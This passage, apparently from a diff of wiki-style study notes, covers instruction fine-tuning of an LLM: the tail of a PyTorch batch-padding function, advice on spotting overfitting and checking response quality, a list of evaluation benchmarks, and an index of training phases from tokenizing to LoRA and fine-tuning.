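    max_len = max(len(item) for item in batch) + 1  # +1 so every item gets at least one pad
    inputs, targets = [], []
    for item in batch:
        padded = item + [pad_id] * (max_len - len(item))
        inp = torch.tensor(padded[:-1])   # input: everything but the last token
        tgt = torch.tensor(padded[1:])    # target: input shifted 1 to the right
        pad_positions = torch.nonzero(tgt == pad_id).squeeze(-1)
        if pad_positions.numel() > 1:
            tgt[pad_positions[1:]] = ignore_index  # keep the first endoftext, mask the rest
        inputs.append(inp)
        targets.append(tgt)
    return torch.stack(inputs), torch.stack(targets)
```
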
## Load pretrained LLM & Fine tune & Loss Checking

It's needed to load a pre-trained LLM to fine-tune it. This was already discussed in other pages. Then, it's possible to use the previously used training function to fine-tune the LLM.

During the training it's also possible to see how the training loss and validation loss vary over the epochs, to see if the loss is getting reduced and if overfitting is occurring.\
Remember that overfitting occurs when the training loss is getting reduced but the validation loss is not being reduced or is even increasing. To avoid this, the simplest thing to do is to stop the training at the epoch where this behaviour starts.

## Response Quality

As this is not a classification fine-tune where it's possible to trust the loss variations more, it's also important to check the quality of the responses in the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** to see if there are wrong answers (note that it's possible for the LLM to correctly create the format and syntax of the response sentence but give a completely wrong response. The loss variation won't reflect this behaviour).\
Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and asking them to evaluate the responses**.

Other tests to run to verify the quality of the responses:

1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels, from elementary to advanced professional.
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be directly compared.
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 assesses the responses of other models to various prompts.
4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural-language understanding tasks, including sentiment analysis, textual entailment, and question answering.
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes more challenging tasks designed to be difficult for current models.
6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with over 200 tasks that test a model's abilities in areas like reasoning, translation, and question answering.
7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics like accuracy, robustness, and fairness.
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows testing of AI models on custom and standardized tasks.
9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate the code generation abilities of language models.
10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.

And many many more

## Follow instructions fine-tuning code

You can find an example of the code to perform this fine-tuning at [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)

## References

- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)

@ -1,98 +0,0 @@
# LLM Training - Data Preparation

**These are my notes from the highly recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.**

## Basic Information

You should start by reading this post for some basic concepts you should know about:

{{#ref}}
0.-basic-llm-concepts.md
{{#endref}}

## 1. Tokenizing

> [!TIP]
> The goal of this initial phase is very simple: **Divide the input into tokens (ids) in some way that makes sense.**

{{#ref}}
1.-tokenizing.md
{{#endref}}

## 2. Data Sampling

> [!TIP]
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase, usually by separating the dataset into sentences of a specific length and also generating the expected response.**

{{#ref}}
2.-data-sampling.md
{{#endref}}

## 3. Token Embeddings

> [!TIP]
> The goal of this third phase is very simple: **Assign each of the tokens in the vocabulary a vector of the desired dimensions to train the model.** Each word in the vocabulary will be a point in a space of X dimensions.\
> Note that initially the position of each word in the space is just initialised "randomly", and these positions are trainable parameters (they will be improved during the training).
>
> Moreover, during the token embedding **another layer of embeddings is created** which represents (in this case) the **absolute position of the word in the training sentence**. This way a word in different positions in the sentence will have a different representation (meaning).

{{#ref}}
3.-token-embeddings.md
{{#endref}}

## 4. Attention Mechanisms

> [!TIP]
> The goal of this fourth phase is very simple: **Apply some attention mechanisms**. These are going to be a lot of **repeated layers** that are going to **capture the relation of a word in the vocabulary with its neighbours in the current sentence being used to train the LLM**.\
> A lot of layers are used for this, so a lot of trainable parameters are going to be capturing this information.

{{#ref}}
4.-attention-mechanisms.md
{{#endref}}

## 5. LLM Architecture

> [!TIP]
> The goal of this fifth phase is very simple: **Develop the architecture of the full LLM**. Put everything together, apply all the layers and create all the functions to generate text or transform text to IDs and backwards.
>
> This architecture will be used for both training and predicting text.

{{#ref}}
5.-llm-architecture.md
{{#endref}}

## 6. Pre-training & Loading models

> [!TIP]
> The goal of this sixth phase is very simple: **Train the model from scratch**. For this, the previous LLM architecture will be used with some loops going over the datasets, using the defined loss function and optimizer to train all the parameters of the model.

{{#ref}}
6.-pre-training-and-loading-models.md
{{#endref}}

## 7.0. LoRA Improvements in fine-tuning

> [!TIP]
> The use of **LoRA greatly reduces the computation** needed to **fine-tune** already trained models.

{{#ref}}
7.0.-lora-improvements-in-fine-tuning.md
{{#endref}}

## 7.1. Fine-Tuning for Classification

> [!TIP]
> The goal of this section is to show how to fine-tune an already pre-trained model so that, instead of generating new text, the LLM will give the **probabilities of the given text being categorized in each of the given categories** (like whether a text is spam or not).

{{#ref}}
7.1.-fine-tuning-for-classification.md
{{#endref}}

## 7.2. Fine-Tuning to follow instructions

> [!TIP]
> The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot.

{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}